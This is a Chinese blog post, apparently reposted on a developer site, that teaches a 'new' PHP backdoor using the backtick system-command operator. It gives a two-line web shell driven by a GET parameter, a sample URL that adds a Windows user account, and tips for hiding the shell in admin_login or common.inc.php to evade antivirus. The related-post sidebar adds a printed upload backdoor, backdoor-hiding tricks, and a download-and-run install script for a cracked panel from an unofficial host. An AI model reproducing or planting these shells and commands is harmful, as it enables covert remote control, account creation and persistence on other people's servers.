在宝塔php里留后门,揭秘PHP的一种新型留后门方式

最新推荐文章于 2024-07-10 07:05:01 发布
最新推荐文章于 2024-07-10 07:05:01 发布
阅读量382 收藏
点赞数
文章标签: 在宝塔php里留后门

转载不加作者名字的木JJ。

作者:猴子 博客:www.sbmonkey.com

php内大致有这么几种运算符。

按运算符号的功能分为:

一:算术运算符(+ - * / % ++ --)

二:字符串运算符 . 可以叫连接运算符号

三:赋值运算符 = += -= *= /= %= .=

四:比较运算符 > < >= <= == === <> != !==

五:逻辑运算符 &&或and ||或or !或not

六:位运算符 & | ^ ~ << >> <<<

七:其他运算符 ? : `` @ => -> :: & $

而其中`` 在PHP中,我给它命名是系统运算符

因为包含在``内的字符串可以当做系统命令来执行,那么简单的。。

为了逃过杀软的查杀。。。。一种新型的PHP后门出来了。

$houzi = $_GET['monkey'];

echo `$houzi`;

?>

http://www.sbmonkey.com/1.php?monkey=net user monkey monkey /add

很明显的monkey变量的内容为net user monkey monkey /add。需要执行什么命令只需要monkey变量的值。

我们不必如此拘束。我们可以把他放在任意文件内

如:admin_login.asp

把这两句加入在中间增强隐蔽效果。

$houzi = $_GET['monkey'];

echo `$houzi`;

执行:

http://www.2cto.com /admin/admin_login.php?monkey=net user monkey monkey /add

以前有的人喜欢把后门放在common.inc.php内。这样,所有require 此文件的文件都可以当做后门

既然这样

那么我们完全可以在common.inc.php内使用

$GLOBALS['monkey']="net user monkey monkey /add"

来声明一个超级全局变量,然后在其他我们想插入的文件内插入echo `$houzi`;

这样做方便,免杀效果好

需要谨慎防御

CodeQueenbee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
再谈宝塔后门账号维权
milu_Sec的博客
12-31 701
上一篇文章提到一个宝塔账号维权的思路,本来这篇文章到此就结束了,但昨晚群有师傅提到该思路只能用于旧版本,于是麋鹿就写了一篇续集,谈一下后续版本如何继续使用该思路。format的意思一目了然就是获取宝塔插件(英文为plugin)users插件的地址,而宝塔插件的地址为/www/server/panel/plugin。在default.db加一个后门宝塔算法在上一篇文章提到过,没看过或者还不到的读者可以回头看一下,文章链接如下。字段,然后加密,最后去循环检查users表是否与提交的用户名相匹配。
php如何后门,ThinkPHP后门技巧
weixin_35451402的博客
03-28 1079
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116721.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候意到的,干脆分析一下代码和操作过程。thinkphp的I函数,是其处理输入的函数,一般...
PHP设置后门保护代码的亲身经历
最新发布
Li91314的博客
07-10 151
只有这样,我们才能确保自己的网站在日益复杂的网络环境中安全、稳定地运行。那天,我收到了一封来自服务器的警报邮件,说网站可能存在安全风险。这让我意识到,我的网站可能存在后门,被攻击者利用。通过这些措施的实施,我成功地保护了我的网站免受恶意攻击。只有不断学习、不断实践、不断完善自己的安全措施,才能确保网站的安全和稳定。但在这个过程中,我意识到,仅仅关闭后门是不够的,更重要的是要预防类似的事情再次发生。直到有一次,我负责维护的一个小型网站遭遇了恶意攻击,我才深刻意识到保护代码的重要性。
php在服务器上后门,服务器上发现的一段PHP后门程序
weixin_31913479的博客
03-09 214
服务器上发现的一段PHP后门程序error_reporting(0);$path = __DIR__;if ($_GET["login"] == "2M05Wd") {if (isset($_FILES["uploadedfile"])) {$target_path = basename($_FILES["uploadedfile"]["name"]);if (move_uploaded_file...
php 程序后门,PHP后门程序
weixin_33376592的博客
03-17 441
*{font-size: 12px;}a{text-decoration: none; color: blue;}a:hover{text-decoration: underline; color:red;}$folder_count = $file_count = 0;function deleteAll($directory, $empty = false) {global $folder_c...
PHP节节云-宝塔主机面板 v1.0.13 源码下载
10-24
节节云-宝塔主机面板包含了批量建站,权限分配,站点同步,多台服务器多站点统一化管理,一键登录宝塔面板等功能。 应用类型:宝塔站点(主机管理) 应用描述:支持Windows/Linux系统,同步宝塔站点和管理站点(包含...
宝塔PHP7+安装mysql拓展
11-09
在扩展解压后的文件夹执行下面命令 /www/server/php/74/bin/phpize 3.进行configure ./configure --with-php-config=/www/server/php/74/bin/php-config 4.make && make install 这一步结束后,系统会提示: ...
在Centos7服务上配置使用宝塔面板(PHP环境)
01-07
宝塔官网 宝塔官网地址 centos7环境搭建 使用Hyper -V搭建centos服务器 安装宝塔 复制安装命令 yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh 在...
基于宝塔面板给站点新增删除域名接口php
11-20
在IT行业中,宝塔面板是一款广泛使用的服务器管理工具,它为用户提供了一个图形化的界面来管理服务器上的各种服务,包括网站、数据库、FTP等。本文将深入探讨如何利用PHP编程语言在宝塔面板上实现站点域名的新增与...
php如何开后门,php如何隐藏后门
weixin_35692916的博客
03-18 283
php如何隐藏后门php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名解决覆盖...
怎么使用php后门,PHP后门的一些用法
weixin_36078790的博客
03-29 502
今天我们说一些最常见的PHP后门的一些用法首先,写一个最简单的后门,也可以叫做木马。
linux下宝塔的有后门,宝塔Linux面板安全入口地址忘了(方法一)
weixin_39902345的博客
05-16 1550
现在新安装的宝塔 Linux 面板时都会开启安全入口登录,获得的面板登录地址都会带有一个随机 8 位字符,如http://服务器 IP:8888/abcd1234。这 8 位字符是可以在面板设置中修改,如下图所示,点击【修改】按钮后输入 6 位以上字符后点击【提交】按钮即可成功修改安全入口地址。那么如果我们忘记了这个安全登录地址后应该怎么办呢?其实只需要输入面板登录地址,后面的安全入口地址可以不输...
php怎么cookie后门,ThinkPHP后门技巧
weixin_39679468的博客
03-12 177
原文连接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.htmlphp90sec上有人问,我说了还有小白不会用。去年我审计TP的时候意到的,干脆分析一下代码和操做过程。htmlthinkphp的I函数,是其处理输入的函数,通常用法为I('get.id')——从$_GET数组中取出键为id的值,post、cook...
PHP_GET后门,躲避任何安全软件
weixin_30813225的博客
01-23 203
经常拿到一些比较好的php站想要住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,后门没有被删过了。 <?php file_put_contents('xpxp.php',"$_GET[uname]");//此段代码插入它正常的PHP面,最好插头部。 复制代码利用也很...
红帽学习nginx+php-fpm预后门
qq_40168905的博客
11-01 546
掌握nginx+php-fpm学习
php简单后门实现及php连接数据库
qq_58683895的博客
10-24 962
包含php简单后门的实现代码及操作,以及php连接数据库的操作代码及介绍,和相关php函数的介绍
宝塔7.9最新企业版免授权无后门
m0_55132646的博客
11-12 4182
宝塔面板大家应该都知道吧 今天带来的是宝塔面板企业版免授权,无需绑定账号版本 用ssh链接上我们的服务器输入下列命令回车,然后过一会会让输入一个东西,输y即可(与正版宝塔安装步骤一致) yum install -y wget && wget -O install.sh http://y1.mcbk1.cn/install/install_6.0.sh && sh install.sh 等待几分钟安装完成之后就可以看到相关信息了,面的那些企业版和专业版的插件都是可
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值